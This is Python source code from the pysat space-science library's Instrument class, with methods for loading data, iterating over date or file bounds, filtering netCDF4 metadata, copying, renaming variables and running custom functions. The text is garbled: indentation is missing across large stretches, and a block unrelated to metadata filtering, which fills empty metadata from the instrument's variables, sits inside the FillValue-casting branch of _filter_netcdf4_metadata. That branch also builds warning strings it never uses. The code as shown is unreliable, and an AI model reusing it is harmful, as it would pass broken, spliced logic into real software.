data, mdata = self._load_rtn(load_fname, tag=self.tag,
inst_id=self.inst_id,
**load_kwargs)
# ensure units and name are named consistently in new Meta
# object as specified by user upon Instrument instantiation
mdata.accept_default_labels(self.meta)
bad_datetime = False
except pds.errors.OutOfBoundsDatetime:
bad_datetime = True
data = self._null_data.copy()
mdata = pysat.Meta(labels=self.meta_labels)
else:
bad_datetime = False
data = self._null_data.copy()
mdata = pysat.Meta(labels=self.meta_labels)
output_str = '{platform} {name} {tag} {inst_id}'
output_str = output_str.format(platform=self.platform,
name=self.name, tag=self.tag,
inst_id=self.inst_id)
# Check that data and metadata are the data types we expect
if not isinstance(data, self._data_library):
raise TypeError(' '.join(('Data returned by instrument load',
'routine must be a', self._data_library)))
if not isinstance(mdata, pysat.Meta):
raise TypeError('Metadata returned must be a pysat.Meta object')
# Let user know whether or not data was returned
ind = data.index if self.pandas_format else data.indexes
if len(ind) > 0:
if date is not None:
output_str = ' '.join(('Returning', output_str, 'data for',
date.strftime('%d %B %Y')))
else:
if len(fname) == 1:
# this check was zero
output_str = ' '.join(('Returning', output_str,
'data from', fname[0]))
else:
output_str = ' '.join(('Returning', output_str,
'data from', fname[0], '::',
fname[-1]))
else:
# no data signal
if date is not None:
if bad_datetime:
output_str = ' '.join(('Bad datetime for', output_str,
date.strftime('%d %B %Y')))
else:
output_str = ' '.join(('No', output_str, 'data for',
date.strftime('%d %B %Y')))
else:
if len(fname) == 1:
output_str = ' '.join(('No', output_str, 'data for',
fname[0]))
elif len(fname) == 0:
output_str = ' '.join(('No', output_str, 'valid',
'filenames found'))
else:
output_str = ' '.join(('No', output_str, 'data for',
fname[0], '::',
fname[-1]))
# Remove extra spaces, if any are present
output_str = " ".join(output_str.split())
logger.info(output_str)
return data, mdata
def _load_next(self):
"""Load the next days data (or file) without incrementing the date
Returns
-------
data : (pds.DataFrame or xr.Dataset)
pysat data
meta : (pysat.Meta)
pysat meta data
Note
----
Repeated calls will not advance date/file and will produce the same
data.
Uses info stored in object to either increment the date,
or the file. Looks for self._load_by_date flag.
"""
if self._load_by_date:
next_date = self.date + self.load_step
return self._load_data(date=next_date, inc=self.load_step)
else:
next_id = self._fid + self.load_step + 1
return self._load_data(fid=next_id, inc=self.load_step)
def _load_prev(self):
"""Load the previous days data (or file) without decrementing the date
Returns
-------
data : (pds.DataFrame or xr.Dataset)
pysat data
meta : (pysat.Meta)
pysat meta data
Note
----
Repeated calls will not decrement date/file and will produce the same
data
Uses info stored in object to either decrement the date,
or the file. Looks for self._load_by_date flag.
"""
if self._load_by_date:
prev_date = self.date - self.load_step
return self._load_data(date=prev_date, inc=self.load_step)
else:
prev_id = self._fid - self.load_step - 1
return self._load_data(fid=prev_id, inc=self.load_step)
def _set_load_parameters(self, date=None, fid=None):
""" Set the necesssary load attributes
Parameters
----------
date : (dt.datetime.date object or NoneType)
file date
fid : (int or NoneType)
filename index value
"""
# Filter supplied data so that it is only year, month, and day and
# then store as part of instrument object. Filtering is performed
# by the class property `self.date`
self.date = date
self._fid = fid
if date is not None:
year, doy = utils.time.getyrdoy(date)
self.yr = year
self.doy = doy
self._load_by_date = True
else:
self.yr = None
self.doy = None
self._load_by_date = False
def _get_var_type_code(self, coltype):
"""Determines the two-character type code for a given variable type
Parameters
----------
coltype : type or np.dtype
The type of the variable
Returns
-------
str
The variable type code for the given type
Raises
------
TypeError
When coltype is unknown
Note
----
Understands np.dtype, numpy int, uint, and float variants, and
str subclasses
"""
var_types = {np.int64: 'i8', np.int32: 'i4', np.int16: 'i2',
np.int8: 'i1', np.uint64: 'u8', np.uint32: 'u4',
np.uint16: 'u2', np.uint8: 'u1', np.float64: 'f8',
np.float32: 'f4'}
if isinstance(coltype, np.dtype):
var_type = coltype.kind + str(coltype.itemsize)
return var_type
else:
if coltype in var_types.keys():
return var_types[coltype]
elif issubclass(coltype, str):
return 'S1'
else:
raise TypeError('Unknown Variable Type' + str(coltype))
def _get_data_info(self, data):
"""Support file writing by determining data type and other options
Parameters
----------
data : pandas object
Data to be written
Returns
-------
data : pandas object
Data that was supplied, reformatted if necessary
data_type : type
Type for data values
datetime_flag : bool
True if data is np.datetime64, False otherwise
"""
# Get the data type
data_type = data.dtype
# Check for object type
if data_type != np.dtype('O'):
# Simple data, not an object
if data_type == np.dtype('<M8[ns]'):
data_type = np.int64
datetime_flag = True
else:
datetime_flag = False
else:
# We're dealing with a more complicated object. Iterate
# over elements until we hit something that is something,
# and not NaN
data_type = type(data.iloc[0])
for i in np.arange(len(data)):
if len(data.iloc[i]) > 0:
data_type = type(data.iloc[i])
if not isinstance(data_type, float) \
or (not isinstance(data_type, np.floating)):
break
datetime_flag = False
return data, data_type, datetime_flag
def _filter_netcdf4_metadata(self, mdata_dict, coltype, remove=False,
export_nan=None):
"""Filter metadata properties to be consistent with netCDF4.
Parameters
----------
mdata_dict : dict
Dictionary equivalent to Meta object info
coltype : type
Type provided by _get_data_info
remove : bool
Removes FillValue and associated parameters disallowed for strings
(default=False)
export_nan : list or NoneType
Metadata parameters allowed to be NaN (default=None)
Returns
-------
dict
Modified as needed for netCDf4
Note
----
Remove forced to True if coltype consistent with a string type
Metadata values that are NaN and not listed in export_nan are
filtered out.
"""
# Remove any metadata with a value of NaN not present in export_nan
filtered_dict = mdata_dict.copy()
for key, value in mdata_dict.items():
try:
if np.isnan(value):
if key not in export_nan:
filtered_dict.pop(key)
except TypeError:
# If a TypeError thrown, it's not NaN
pass
mdata_dict = filtered_dict
# Coerce boolean types to integers
for key in mdata_dict:
if type(mdata_dict[key]) == bool:
mdata_dict[key] = int(mdata_dict[key])
if coltype == str:
remove = True
warnings.warn('FillValue is not an acceptable '
'parameter for strings - it will be removed')
# Make sure _FillValue is the same type as the data
if '_FillValue' in mdata_dict.keys():
if remove:
mdata_dict.pop('_FillValue')
else:
if not np.can_cast(mdata_dict['_FillValue'], coltype):
if 'FieldNam' in mdata_dict:
estr = ' '.join(('FillValue for {a:s} ({b:s}) cannot',
'be safely casted to {c:s} Casting',
'anyways. This may result in',
'unexpected behavior'))
estr.format(a=mdata_dict['FieldNam'],
b=str(mdata_dict['_FillValue']),
c=coltype)
warnings.warn(estr)
else:
estr = ' '.join(('FillValue {a:s} cannot be safely',
'casted to {b:s}. Casting anyways.',
'This may result in unexpected',
'behavior'))
estr.format(a=str(mdata_dict['_FillValue']),
b=coltype)
# check if load routine actually returns meta
if self.meta.data.empty:
self.meta[self.variables] = {self.meta.labels.name: self.variables,
self.meta.labels.units:
[''] * len(self.variables)}
# Make sure FillValue is the same type as the data
if 'FillVal' in mdata_dict.keys():
if remove:
mdata_dict.pop('FillVal')
else:
mdata_dict['FillVal'] = np.array(
mdata_dict['FillVal']).astype(coltype)
return mdata_dict
# -----------------------------------------------------------------------
# Define all accessible methods
@property
def bounds(self):
"""Boundaries for iterating over instrument object by date or file.
Parameters
----------
start : datetime object, filename, or None
start of iteration, if None uses first data date.
list-like collection also accepted. (default=None)
stop : datetime object, filename, or None
stop of iteration, inclusive. If None uses last data date.
list-like collection also accepted. (default=None)
step : str, int, or None
Step size used when iterating from start to stop. Use a
Pandas frequency string ('3D', '1M') when setting bounds by date,
an integer when setting bounds by file. Defaults to a single
day/file (default='1D', 1).
width : pandas.DateOffset, int, or None
Data window used when loading data within iteration. Defaults to a
single day/file if not assigned. (default=dt.timedelta(days=1),
1)
Note
----
Both start and stop must be the same type (date, or filename) or None.
Only the year, month, and day are used for date inputs.
Examples
--------
::
import datetime as dt
import pandas as pds
import pysat
inst = pysat.Instrument(platform=platform,
name=name,
tag=tag)
start = dt.datetime(2009, 1, 1)
stop = dt.datetime(2009, 1, 31)
# Defaults to stepping by a single day and a data loading window
# of one day/file.
inst.bounds = (start, stop)
# Set bounds by file. Iterates a file at a time.
inst.bounds = ('filename1', 'filename2')
# Create a more complicated season, multiple start and stop dates.
start2 = dt.datetetime(2010,1,1)
stop2 = dt.datetime(2010,2,14)
inst.bounds = ([start, start2], [stop, stop2])
# Iterate via a non-standard step size of two days.
inst.bounds = ([start, start2], [stop, stop2], '2D')
# Load more than a single day/file at a time when iterating
inst.bounds = ([start, start2], [stop, stop2], '2D',
dt.timedelta(days=3))
"""
return (self._iter_start, self._iter_stop, self._iter_step,
self._iter_width)
    @bounds.setter
    def bounds(self, value=None):
        # Set the bounds property. See property docstring for details.
        # `value` is (start, stop[, step[, width]]); None resets to defaults.
        if value is None:
            # User wants defaults
            value = (None, None, None, None)
        if len(value) < 2:
            raise ValueError(' '.join(('Must supply both a start and stop',
                                       'date/file. Supply None if you want the',
                                       'first/last possible.')))
        elif len(value) == 2:
            # Includes start and stop only
            self._iter_step = None
            self._iter_width = None
        elif len(value) == 3:
            # Also includes step size
            self._iter_step = value[2]
            self._iter_width = None
        elif len(value) == 4:
            # Also includes loading window (data width)
            self._iter_step = value[2]
            self._iter_width = value[3]
        else:
            raise ValueError('Too many input arguments.')
        # Pull out start and stop times now that other optional items have
        # been checked out.
        start = value[0]
        stop = value[1]
        if (start is None) and (stop is None):
            # Set default using first and last file date
            self._iter_start = [self.files.start_date]
            self._iter_stop = [self.files.stop_date]
            self._iter_type = 'date'
            if self._iter_step is None:
                self._iter_step = '1D'
            if self._iter_width is None:
                self._iter_width = dt.timedelta(days=1)
            if self._iter_start[0] is not None:
                # There are files. Use those dates.
                # Shrink each stop so that a full `_iter_width` load starting
                # at the final iteration date does not extend past the bound.
                ustops = [istop - self._iter_width + dt.timedelta(days=1)
                          for istop in self._iter_stop]
                ufreq = self._iter_step
                self._iter_list = utils.time.create_date_range(self._iter_start,
                                                               ustops,
                                                               freq=ufreq)
            else:
                # Instrument has no files
                self._iter_list = []
        else:
            # User provided some inputs, ensure always a 1D list
            starts = pysat.utils.listify(start)
            stops = pysat.utils.listify(stop)
            # check equal number of elements
            if len(starts) != len(stops):
                estr = ' '.join(('Both start and stop must have the same',
                                 'number of elements'))
                raise ValueError(estr)
            # check everything is the same type
            base = type(starts[0])
            for lstart, lstop in zip(starts, stops):
                etype = type(lstop)
                check1 = not isinstance(lstart, etype)
                check2 = not isinstance(lstart, base)
                if check1 or check2:
                    # Method allows for inputs like inst.bounds = (start, None)
                    # and bounds will fill the None with actual start or stop.
                    # Allow for a Nonetype only if length is one.
                    if len(starts) == 1 and (start is None):
                        # we are good on type change, start is None, no error
                        break
                    elif len(stops) == 1 and (stop is None):
                        # we are good on type change, stop is None, no error
                        break
                    raise ValueError(' '.join(('Start and stop items must all',
                                               'be of the same type')))
            # set bounds based upon passed data type
            if isinstance(starts[0], str) or isinstance(stops[0], str):
                # one of the inputs is a string
                self._iter_type = 'file'
                # could be (string, None) or (None, string)
                # replace None with first/last, as appropriate
                if starts[0] is None:
                    starts = [self.files[0]]
                if stops[0] is None:
                    stops = [self.files[-1]]
                # Default step size
                if self._iter_step is None:
                    self._iter_step = 1
                # Default window size
                if self._iter_width is None:
                    self._iter_width = 1
                self._iter_list = []
                for istart, istop in zip(starts, stops):
                    # Ensure istart begins before istop. Get the index of
                    # the file start/stop times from main file list.
                    start_idx = self.files.get_index(istart)
                    stop_idx = self.files.get_index(istop)
                    if stop_idx < start_idx:
                        estr = ' '.join(('Bounds must be in increasing date',
                                         'order.', istart, 'occurs after',
                                         istop))
                        raise ValueError(estr)
                    itemp = self.files.get_file_array([istart], [istop])
                    # downselect based upon step size
                    itemp = itemp[::self._iter_step]
                    # Make sure iterations don't go past last day
                    # get index of last in iteration list
                    iter_idx = self.files.get_index(itemp[-1])
                    # don't let loaded data go past stop bound; trim enough
                    # trailing entries that a full-width load from the last
                    # remaining file stays inside the bound.
                    if iter_idx + self._iter_width - 1 > stop_idx:
                        i = np.ceil((self._iter_width - 1) / self._iter_step)
                        i = -np.int64(i)
                        self._iter_list.extend(itemp[:i])
                    else:
                        self._iter_list.extend(itemp)
            elif isinstance(starts[0], dt.datetime) or isinstance(stops[0],
                                                                  dt.datetime):
                # One of the inputs is a date
                self._iter_type = 'date'
                if starts[0] is None:
                    # Start and stop dates on self.files already filtered
                    # to include only year, month, and day
                    starts = [self.files.start_date]
                if stops[0] is None:
                    stops = [self.files.stop_date]
                # Default step size
                if self._iter_step is None:
                    self._iter_step = '1D'
                # Default window size
                if self._iter_width is None:
                    self._iter_width = dt.timedelta(days=1)
                # Create list-like of dates for iteration
                starts = utils.time.filter_datetime_input(starts)
                stops = utils.time.filter_datetime_input(stops)
                freq = self._iter_step
                width = self._iter_width
                # Ensure inputs are in reasonable date order
                for start, stop in zip(starts, stops):
                    if start > stop:
                        estr = ' '.join(('Bounds must be set in increasing',
                                         'date order.',
                                         start.strftime('%d %B %Y'),
                                         'is later than',
                                         stop.strftime('%d %B %Y')))
                        raise ValueError(estr)
                # account for width of load. Don't extend past bound.
                ustops = [stop - width + dt.timedelta(days=1)
                          for stop in stops]
                self._iter_list = utils.time.create_date_range(starts,
                                                               ustops,
                                                               freq=freq)
                # go back to time index
                self._iter_list = pds.DatetimeIndex(self._iter_list)
            else:
                raise ValueError(' '.join(('Input is not a known type, string',
                                           'or datetime')))
            self._iter_start = starts
            self._iter_stop = stops
        return
    @property
    def empty(self):
        """Boolean flag reflecting lack of data, True if there is no data.

        Note
        ----
        Delegates to the private `self._empty` helper.

        """
        return self._empty()
    @property
    def date(self):
        """Date for loaded data, filtered on assignment to year/month/day."""
        return self._date
    @date.setter
    def date(self, new_date):
        # Set the date property, see property docstring for details.
        # Input is run through `utils.time.filter_datetime_input` so only
        # year, month, and day information is stored.
        self._date = utils.time.filter_datetime_input(new_date)
    @property
    def index(self):
        """Returns time index of loaded data via the `self._index` helper."""
        return self._index()
@property
def variables(self):
"""Returns list of variables within loaded data."""
if self.pandas_format:
return self.data.columns
else:
return list(self.data.variables.keys())
    def copy(self):
        """Deep copy of the entire Instrument object.

        Returns
        -------
        pysat.Instrument

        """
        # Copy doesn't work with module objects. Store module and files class,
        # set module variable/files to `None`, make the copy, reassign the
        # saved modules.
        saved_module = self.inst_module
        # The files/orbits class copy() not invoked with deepcopy
        saved_files = self.files
        saved_orbits = self.orbits
        # Temporarily detach the problematic attributes so deepcopy succeeds
        self.inst_module = None
        self.files = None
        self.orbits = None
        # Copy non-problematic parameters
        inst_copy = copy.deepcopy(self)
        # Restore links to the instrument support functions module
        inst_copy.inst_module = saved_module
        self.inst_module = saved_module
        # Reattach files and copy
        inst_copy.files = saved_files.copy()
        self.files = saved_files
        # Reattach orbits and copy
        inst_copy.orbits = saved_orbits.copy()
        self.orbits = saved_orbits
        # Support a copy if a user does something like,
        # self.orbits.inst.copy(), or
        # self.files.inst_info['inst'].copy()
        # NOTE(review): the isinstance test presumably catches the case where
        # `self` was itself a weakref proxy so the copy cannot be re-proxied
        # — confirm against the weakref usage in Files/Orbits.
        if not isinstance(inst_copy, weakref.ProxyType):
            inst_copy.files.inst_info['inst'] = weakref.proxy(inst_copy)
            inst_copy.orbits.inst = weakref.proxy(inst_copy)
        else:
            inst_copy.files.inst_info['inst'] = inst_copy
            inst_copy.orbits.inst = inst_copy
        return inst_copy
def concat_data(self, new_data, prepend=False, **kwargs):
"""Concats new_data to self.data for xarray or pandas as needed
Parameters
----------
new_data : pds.DataFrame, xr.Dataset, or list of such objects
New data objects to be concatonated
prepend : boolean
If True, assign new data before existing data; if False append new
data (default=False)
**kwargs : dict
Optional keyword arguments passed to pds.concat or xr.concat
Note
----
For pandas, sort=False is passed along to the underlying
pandas.concat method. If sort is supplied as a keyword, the
user provided value is used instead. Recall that sort orders the
data columns, not the data values or the index.
For xarray, dim=Instrument.index.name is passed along to xarray.concat
except if the user includes a value for dim as a keyword argument.
"""
# Order the data to be concatonated in a list
if not isinstance(new_data, list):
new_data = [new_data]
if prepend:
new_data.append(self.data)
else:
new_data.insert(0, self.data)
# Retrieve the appropriate concatonation function
if self.pandas_format:
# Specifically do not sort unless otherwise specified
if 'sort' not in kwargs:
kwargs['sort'] = False
concat_func = pds.concat
else:
# Specify the dimension, if not otherwise specified
if 'dim' not in kwargs:
kwargs['dim'] = self.index.name
concat_func = xr.concat
# Assign the concatonated data to the instrument
self.data = concat_func(new_data, **kwargs)
return
def custom_attach(self, function, at_pos='end', args=[], kwargs={}):
"""Attach a function to custom processing queue.
Custom functions are applied automatically whenever `.load()`
command called.
Parameters
----------
function : string or function object
name of function or function object to be added to queue
at_pos : string or int
Accepts string 'end' or a number that will be used to determine
the insertion order if multiple custom functions are attached
to an Instrument object. (default='end').
args : list or tuple
Ordered arguments following the instrument object input that are
required by the custom function (default=[])
kwargs : dict
Dictionary of keyword arguments required by the custom function
(default={})
Note
----
Functions applied using `custom_attach` may add, modify, or use
the data within Instrument inside of the function, and so should not
return anything.
"""
# Test the positioning input
pos_list = list(np.arange(0, len(self.custom_functions), 1))
pos_list.append('end')
if at_pos not in pos_list:
logger.warning(''.join(['unknown position specified, including ',
'function at end of current list']))
at_pos = 'end'
# Convert string to function object, if necessary
if isinstance(function, str):
function = eval(function)
# If the position is 'end' or greater
if (at_pos == 'end') | (at_pos == len(self.custom_functions)):
# store function object
self.custom_functions.append(function)
self.custom_args.append(args)
self.custom_kwargs.append(kwargs)
else:
# user picked a specific location to insert
self.custom_functions.insert(at_pos, function)
self.custom_args.insert(at_pos, args)
self.custom_kwargs.insert(at_pos, kwargs)
return
def custom_apply_all(self):
""" Apply all of the custom functions to the satellite data object.
Raises
------
ValueError
Raised when function returns any value
Note
----
This method does not generally need to be invoked directly by users.
"""
if len(self.custom_functions) > 0:
for func, arg, kwarg in zip(self.custom_functions,
self.custom_args,
self.custom_kwargs):
if not self.empty:
# Custom functions do nothing or modify loaded data. Methods
# are run on Instrument object directly and any changes to
# object by the method are retained. No data may be returned
# by method itself.
null_out = func(self, *arg, **kwarg)
if null_out is not None:
raise ValueError(''.join(('Custom functions should not',
' return any information via',
' return. Information may ',
'only be propagated back by',
' modifying supplied pysat ',
'object.')))
return
def custom_clear(self):
"""Clear the custom function list.
"""
self.custom_functions = []
self.custom_args = []
self.custom_kwargs = []
return
    def today(self):
        """Returns today's date (UTC), with no hour, minute, second, etc.

        Returns
        -------
        today_utc : datetime
            Today's date in UTC

        Note
        ----
        Delegates to `utils.time.today` for consistent date filtering.

        """
        return utils.time.today()
def tomorrow(self):
"""Returns tomorrow's date (UTC), with no hour, minute, second, etc.
Returns
-------
datetime
Tomorrow's date in UTC
"""
return self.today() + dt.timedelta(days=1)
def yesterday(self):
"""Returns yesterday's date (UTC), with no hour, minute, second, etc.
Returns
-------
datetime
Yesterday's date in UTC
"""
return self.today() - dt.timedelta(days=1)
    def next(self, verifyPad=False):
        """Manually iterate through the data loaded in Instrument object.

        Bounds of iteration and iteration type (day/file) are set by
        `bounds` attribute.

        Parameters
        ----------
        verifyPad : bool
            Passed to `self.load()`. If True, then padded data within
            the load method will be retained. (default=False)

        Raises
        ------
        StopIteration
            When the iteration list is empty, the loaded date/file cannot be
            found in it, or the next step would pass the stop bound.

        Note
        ----
        If there were no previous calls to load then the
        first day(default)/file will be loaded.

        """
        # make sure we can iterate
        if len(self._iter_list) == 0:
            # nothing to potentially iterate over
            raise StopIteration(''.join(('File list is empty. ',
                                         'Nothing to be done.')))
        if self._iter_type == 'date':
            if self.date is not None:
                # data is already loaded in .data
                idx, = np.where(self.date == self._iter_list)
                if len(idx) == 0:
                    estr = ''.join(('Unable to find loaded date ',
                                    'in the supported iteration list. ',
                                    'Please check the Instrument bounds, ',
                                    '`self.bounds` for supported iteration',
                                    'ranges.'))
                    raise StopIteration(estr)
                elif idx[-1] >= len(self._iter_list) - 1:
                    # gone to far!
                    raise StopIteration('Outside the set date boundaries.')
                else:
                    # not going past the last day, safe to move forward
                    date = self._iter_list[idx[0] + 1]
                    end_date = date + self._iter_width
            else:
                # no data currently loaded, start at the beginning
                date = self._iter_list[0]
                end_date = date + self._iter_width
            # perform load
            self.load(date=date, end_date=end_date, verifyPad=verifyPad)
        elif self._iter_type == 'file':
            first = self.files.get_index(self._iter_list[0])
            last = self.files.get_index(self._iter_list[-1])
            step = self._iter_step
            width = self._iter_width
            if self._fid is not None:
                # data already loaded in .data
                if (self._fid < first) | (self._fid + step > last):
                    raise StopIteration('Outside the set file boundaries.')
                else:
                    # step size already accounted for in the list of files
                    # get location of current file in iteration list
                    idx = None
                    fname = self.files[self._fid]
                    for i, name in enumerate(self._iter_list):
                        if name == fname:
                            idx = i
                            break
                    if idx is None:
                        estr = ''.join(('Unable to find loaded filename ',
                                        'in the supported iteration list. ',
                                        'Please check the Instrument bounds, ',
                                        '`self.bounds` for supported iteration',
                                        'ranges.'))
                        raise StopIteration(estr)
                    fname = self._iter_list[idx + 1]
            else:
                # no data loaded yet, start with the first file
                fname = self._iter_list[0]
            # load range of files at a time
            # get location for second file. Note a width of 1 loads single file
            nfid = self.files.get_index(fname) + width - 1
            self.load(fname=fname, stop_fname=self.files[nfid],
                      verifyPad=verifyPad)
        return
    def prev(self, verifyPad=False):
        """Manually iterate backwards through the data in Instrument object.

        Bounds of iteration and iteration type (day/file)
        are set by `bounds` attribute.

        Parameters
        ----------
        verifyPad : bool
            Passed to `self.load()`. If True, then padded data within
            the load method will be retained. (default=False)

        Raises
        ------
        StopIteration
            When the iteration list is empty, the loaded date/file cannot be
            found in it, or the previous step would pass the start bound.

        Note
        ----
        If there were no previous calls to load then the
        last day/file in the iteration list will be loaded.

        """
        # make sure we can iterate
        if len(self._iter_list) == 0:
            # nothing to potentially iterate over
            raise StopIteration(''.join(('File list is empty. ',
                                         'Nothing to be done.')))
        if self._iter_type == 'date':
            if self.date is not None:
                # some data already loaded in .data
                idx, = np.where(self._iter_list == self.date)
                if len(idx) == 0:
                    estr = ''.join(('Unable to find loaded date ',
                                    'in the supported iteration list. ',
                                    'Please check the Instrument bounds, ',
                                    '`self.bounds` for supported iteration',
                                    'ranges.'))
                    raise StopIteration(estr)
                elif idx[0] == 0:
                    # too far!
                    raise StopIteration('Outside the set date boundaries.')
                else:
                    # not on first day, safe to move backward
                    date = self._iter_list[idx[0] - 1]
                    end_date = self._iter_list[idx[0] - 1] + self._iter_width
                    self.load(date=date, end_date=end_date, verifyPad=verifyPad)
            else:
                # no data currently loaded, start at the end
                end_date = self._iter_list[-1] + self._iter_width
                date = self._iter_list[-1]
                self.load(date=date, end_date=end_date, verifyPad=verifyPad)
        elif self._iter_type == 'file':
            first = self.files.get_index(self._iter_list[0])
            last = self.files.get_index(self._iter_list[-1])
            step = self._iter_step
            width = self._iter_width
            if self._fid is not None:
                # NOTE(review): this boundary test is not the mirror image of
                # the one in `next` — confirm the intended asymmetry.
                if (self._fid - step < first) or (self._fid > last):
                    raise StopIteration('Outside the set file boundaries.')
                else:
                    # find location of file
                    idx = None
                    fname = self.files[self._fid]
                    for i, name in enumerate(self._iter_list):
                        if name == fname:
                            idx = i
                            break
                    if idx is None:
                        estr = ''.join(('Unable to find loaded filename ',
                                        'in the supported iteration list. ',
                                        'Please check the Instrument bounds, ',
                                        '`self.bounds` for supported iteration',
                                        'ranges.'))
                        raise StopIteration(estr)
                    fname = self._iter_list[idx - 1]
            else:
                # no data loaded yet, start with the last file
                fname = self._iter_list[-1]
            # a width of 1 loads a single file
            nfid = self.files.get_index(fname) + width - 1
            self.load(fname=fname, stop_fname=self.files[nfid],
                      verifyPad=verifyPad)
        return
    def rename(self, var_names, lowercase_data_labels=False):
        """Renames variable within both data and metadata.

        Parameters
        ----------
        var_names : dict or other map
            Existing var_names are keys, values are new var_names
        lowercase_data_labels : bool
            If True, the labels applied to inst.data are forced to lowercase.
            The supplied case in var_names is retained within inst.meta.

        Raises
        ------
        ValueError
            When a supplied name is not a known variable

        Examples
        --------
        ::

            # standard renaming
            new_var_names = {'old_name': 'new_name',
                             'old_name2': 'new_name2'}
            inst.rename(new_var_names)

        If using a pandas DataFrame as the underlying data object,
        to rename higher-order variables supply a modified dictionary.
        Note that this rename will be invoked individually for all
        times in the dataset.
        ::

            # applies to higher-order datasets
            # that are loaded into pandas
            # general example
            new_var_names = {'old_name': 'new_name',
                             'old_name2': 'new_name2',
                             'col_name': {'old_ho_name': 'new_ho_name'}}
            inst.rename(new_var_names)

            # specific example
            inst = pysat.Instrument('pysat', 'testing2D')
            inst.load(2009, 1)
            var_names = {'uts': 'pysat_uts',
                         'profiles': {'density': 'pysat_density'}}
            inst.rename(var_names)

        pysat supports differing case for variable labels across the
        data and metadata objects attached to an Instrument. Since
        metadata is case-preserving (on assignment) but case-insensitive,
        the labels used for data are always valid for metadata. This
        feature may be used to provide friendlier variable names within
        pysat while also maintaining external format compatibility
        when writing files.
        ::

            # example with lowercase_data_labels
            inst = pysat.Instrument('pysat', 'testing2D')
            inst.load(2009, 1)
            var_names = {'uts': 'Pysat_UTS',
                         'profiles': {'density': 'PYSAT_density'}}
            inst.rename(var_names, lowercase_data_labels=True)

            # note that 'Pysat_UTS' was applied to data as 'pysat_uts'
            print(inst['pysat_uts'])

            # case is retained within inst.meta, though
            # data access to meta is case insensitive
            print('True meta variable name is ', inst.meta['pysat_uts'].name)

            # Note that the labels in meta may be used when creating a file
            # thus 'Pysat_UTS' would be found in the resulting file
            inst.to_netcdf4('./test.nc', preserve_meta_case=True)

            # load in file and check
            raw = netCDF4.Dataset('./test.nc')
            print(raw.variables['Pysat_UTS'])

        """
        if self.pandas_format:
            # Check for standard rename variables as well as
            # renaming for higher order variables
            fdict = {}  # filtered old variable names
            hdict = {}  # higher order variable names
            # keys for existing higher order data labels
            ho_keys = [a for a in self.meta.keys_nD()]
            lo_keys = [a for a in self.meta.keys()]
            # iterate, collect normal variables
            # rename higher order variables
            for vkey in var_names:
                # original name, new name
                oname, nname = vkey, var_names[vkey]
                if oname not in ho_keys:
                    if oname in lo_keys:
                        # within low order (standard) variable name keys
                        # may be renamed directly
                        fdict[oname] = nname
                    else:
                        # not in standard or higher order variable name keys
                        estr = ' '.join((oname, ' is not',
                                         'a known variable.'))
                        raise ValueError(estr)
                else:
                    # Variable name is in higher order list
                    if isinstance(nname, dict):
                        # Changing a variable name within a higher order object
                        label = [k for k in nname.keys()][0]
                        hdict[label] = nname[label]
                        # ensure variable is there
                        if label not in self.meta[oname]['children']:
                            estr = ''.join((label, ' is not a known ',
                                            'higher-order variable under ',
                                            oname, '.'))
                            raise ValueError(estr)
                        # Check for lowercase flag
                        if lowercase_data_labels:
                            gdict = {}
                            gdict[label] = nname[label].lower()
                        else:
                            gdict = hdict
                        # Change variables for frame at each time
                        for i in np.arange(len(self.index)):
                            # within data itself
                            self[i, oname].rename(columns=gdict,
                                                  inplace=True)
                        # Change metadata, once per variable only hdict used as
                        # it retains user provided case
                        self.meta.ho_data[oname].data.rename(hdict,
                                                             inplace=True)
                        # Clear out dict for next loop
                        hdict.pop(label)
                    else:
                        # Changing the outer 'column' label
                        fdict[oname] = nname
            # Rename regular variables, single go check for lower case data
            # labels first
            if lowercase_data_labels:
                gdict = {}
                for fkey in fdict:
                    gdict[fkey] = fdict[fkey].lower()
            else:
                gdict = fdict
            # Change variable names for attached data object
            self.data.rename(columns=gdict, inplace=True)
        else:
            # xarray renaming: account for lowercase data labels first
            if lowercase_data_labels:
                gdict = {}
                for vkey in var_names:
                    gdict[vkey] = var_names[vkey].lower()
            else:
                gdict = var_names
            self.data = self.data.rename(gdict)
            # Set up dictionary for renaming metadata variables
            fdict = var_names
        # Update normal metadata parameters in a single go. The case must
        # always be preserved in Meta object
        new_fdict = {}
        for fkey in fdict:
            case_old = self.meta.var_case_name(fkey)
            new_fdict[case_old] = fdict[fkey]
        self.meta.data.rename(index=new_fdict, inplace=True)
        return
    def generic_meta_translator(self, input_meta):
        """Translates the metadata contained in an object into a dictionary

        Parameters
        ----------
        input_meta : Meta
            The metadata object to translate

        Returns
        -------
        dict
            A dictionary of the metadata for each variable of an output file
            e.g. netcdf4

        """
        export_dict = {}
        if self._meta_translation_table is not None:
            # Create a translation table for the actual values of the meta
            # labels. The instrument specific translation table only stores the
            # names of the attributes that hold the various meta labels
            translation_table = {}
            for key in self._meta_translation_table:
                translation_table[getattr(self, key)] = \
                    self._meta_translation_table[key]
        else:
            translation_table = None
        # First Order Data
        for key in input_meta.data.index:
            if translation_table is None:
                export_dict[key] = input_meta.data.loc[key].to_dict()
            else:
                # Translate each key if a translation is provided.  A single
                # original label may fan out to several translated labels.
                export_dict[key] = {}
                meta_dict = input_meta.data.loc[key].to_dict()
                for orig_key in meta_dict:
                    if orig_key in translation_table:
                        for translated_key in translation_table[orig_key]:
                            export_dict[key][translated_key] = \
                                meta_dict[orig_key]
                    else:
                        export_dict[key][orig_key] = meta_dict[orig_key]
        # Higher Order Data
        for key in input_meta.ho_data:
            if key not in export_dict:
                export_dict[key] = {}
            for ho_key in input_meta.ho_data[key].data.index:
                # Flatten the nested variable name, e.g. 'outer_inner'
                new_key = '_'.join((key, ho_key))
                if translation_table is None:
                    export_dict[new_key] = \
                        input_meta.ho_data[key].data.loc[ho_key].to_dict()
                else:
                    # Translate each key if a translation is provided
                    export_dict[new_key] = {}
                    meta_dict = \
                        input_meta.ho_data[key].data.loc[ho_key].to_dict()
                    for orig_key in meta_dict:
                        if orig_key in translation_table:
                            for translated_key in translation_table[orig_key]:
                                export_dict[new_key][translated_key] = \
                                    meta_dict[orig_key]
                        else:
                            export_dict[new_key][orig_key] = \
                                meta_dict[orig_key]
        return export_dict
def load(self, yr=None, doy=None, end_yr=None, end_doy=None, date=None,
end_date=None, fname=None, stop_fname=None, verifyPad=False,
**kwargs):
"""Load instrument data into Instrument.data object.
Parameters
----------
yr : integer
Year for desired data. pysat will load all files with an
associated date between yr, doy and yr, doy + 1 (default=None)
doy : integer
Day of year for desired data. Must be present with yr input.
(default=None)
end_yr : integer
Used when loading a range of dates, from yr, doy to end_yr, end_doy
